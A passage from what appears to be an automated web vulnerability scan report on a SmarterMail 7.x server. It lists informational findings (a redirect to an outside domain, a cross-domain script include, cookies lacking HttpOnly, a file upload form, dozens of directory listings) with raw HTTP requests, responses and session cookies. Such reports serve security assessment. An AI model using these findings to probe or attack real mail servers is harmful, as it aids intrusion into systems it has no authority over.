Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
X-AspNet-Version: 2.0.50727
Location: http://cloudscan.me?aspxerrorpath=/UserControls/Popups/frmAddReportItem.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 193
Connection: Close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://cloudscan.me?aspxerrorpath=/UserControls/Popups/frmAddReportItem.aspx">here</a>.</h2>
</body></html>

8.11. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmHelp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmHelp.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /UserControls/Popups/frmHelp.aspx?url= HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5722
Connection: Close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
   SmarterMail Help
</title><lin
...[SNIP]...
<li>
               <a target="_blank" href="http://www.smartertools.com/Help/SmarterMail/v7/Default.aspx?p=_USR&v=7.2.3925&lang=en-US&page=">Help for this Page</a>
...[SNIP]...
<li>
               <a target="_blank" href="http://www.smartertools.com/Help/SmarterMail/v7/Default.aspx?p=_USR&v=7.2.3925&lang=en-US">Help Topics</a>
...[SNIP]...
<li>
               <a target="_blank" href="http://www.smartertools.com/Help/SmarterMail/v7/Default.aspx?p=_USR&v=7.2.3925&lang=en-US&page=search">Search Online Help</a>
...[SNIP]...
<br />
       <a href="http://www.smartertools.com" id="ctl00_MPH_STLink" target="_blank">http://www.smartertools.com</a>
...[SNIP]...

9. Cross-domain script include

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmPrintPreview.aspx

Issue detail

The response dynamically includes the following script from another domain:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /Reports/frmPrintPreview.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:59 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2831
Connection: Close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Print Prev
...[SNIP]...
</title>

   <script type="text/javascript" src="http://code.jquery.com/jquery-1.2.6-vsdoc.js"></script>
...[SNIP]...

10. Cookie without HttpOnly flag set
There are 4 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. http://vulnerable.SmarterMail 7.x.host:9998/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:23:26 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=wmcwqwar3z1uqmbg32jkdrmv; path=/; HttpOnly
Set-Cookie: SM5Skin=Default; expires=Thu, 01-Oct-2020 22:23:26 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 30030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.2. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Login.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55
Content-Length: 999

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BPH%24LoginImageButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUm
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:08 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: SelectedLanguage=; expires=Thu, 01-Oct-2020 22:19:05 GMT; path=/
Set-Cookie: settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; expires=Thu, 01-Oct-2020 22:19:05 GMT; path=/
Set-Cookie: SM5Skin=Default; expires=Thu, 01-Oct-2020 22:19:05 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Content-Length: 53
Connection: Close

35|pageRedirect||/Main/frmWelcome.aspx?unframed=true|

10.3. http://vulnerable.SmarterMail 7.x.host:9998/Logout.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Logout.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Logout.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}

Response

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:48:12 GMT
X-AspNet-Version: 2.0.50727
Location: /Login.aspx
Set-Cookie: SM5Skin=Default; expires=Fri, 02-Oct-2020 00:48:12 GMT; path=/
Set-Cookie: settings=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 130
Connection: Close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fLogin.aspx">here</a>.</h2>
</body></html>

10.4. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmDeviceSync.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /UserControls/Popups/frmDeviceSync.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=
Content-Length: 17133

ctl00%24ScriptManager=ctl00%24ScriptManager%7Cctl00%24BPH%24chkShowAtLogin&__EVENTTARGET=ctl00%24BPH%24chkShowAtLogin&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTkxNjAzNDgyNg8WBB4QX19fUmVzdW
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:51:07 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: SM5Skin=Default; expires=Fri, 02-Oct-2020 00:51:07 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 25944

11|updatePanel|ctl00_UpdatePanel1|
               
           |3645|updatePanel|ctl00_MPH_splitter1_paneMobileDescription_UpdatePanel1|
                           <div class='DeviceWrapper'><div class='DeviceName'>Apple iPod and iPhone<
...[SNIP]...

11. File upload functionality

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmUploadContacts.aspx

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /Main/frmUploadContacts.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:12 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10230
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Import Contacts - hoytll
...[SNIP]...
<td class=" Setting"><input name="ctl00$MPH$Uploader$FilePath" type="file" id="ctl00_MPH_Uploader_FilePath" size="50" maxlength="5242880" /><br />
...[SNIP]...

12. Directory listing
There are 72 instances of this issue:

Issue description

Directory listings do not necessarily constitute a security vulnerability. Any sensitive resources within your web root should be properly access-controlled in any case, and should not be accessible by an unauthorised party who happens to know the URL. Nevertheless, directory listings can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analysing and attacking them.

Issue remediation

There is not usually any good reason to provide directory listings, and disabling them may place additional hurdles in the path of an attacker. This can normally be achieved in two ways:


12.1. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/

Request

GET /App_Themes/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:02 GMT
Content-Length: 1325
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-famil
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.2. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/

Request

GET /App_Themes/Default/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 1984
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {fo
...[SNIP]...
<PRE>
<A href="/App_Themes/">[To Parent Directory]</A>
...[SNIP]...

12.3. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/

Request

GET /App_Themes/Default/CSS/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:02 GMT
Content-Length: 2458
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>
...[SNIP]...

12.4. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/BrowserOverrides/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/BrowserOverrides/

Request

GET /App_Themes/Default/CSS/BrowserOverrides/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1399
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/BrowserOverrides/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bla
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.5. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Error/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Error/

Request

GET /App_Themes/Default/CSS/Error/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1472
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Error/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.6. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/FileDownload/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/FileDownload/

Request

GET /App_Themes/Default/CSS/FileDownload/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1423
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/FileDownload/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.7. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/GettingStarted/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/GettingStarted/

Request

GET /App_Themes/Default/CSS/GettingStarted/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1417
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/GettingStarted/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.8. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Login/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Login/

Request

GET /App_Themes/Default/CSS/Login/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1472
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Login/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.9. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Mail/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Mail/

Request

GET /App_Themes/Default/CSS/Mail/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1911
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Mail/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.10. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Main/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Main/

Request

GET /App_Themes/Default/CSS/Main/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 4651
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Main/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.11. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Popup/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Popup/

Request

GET /App_Themes/Default/CSS/Popup/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
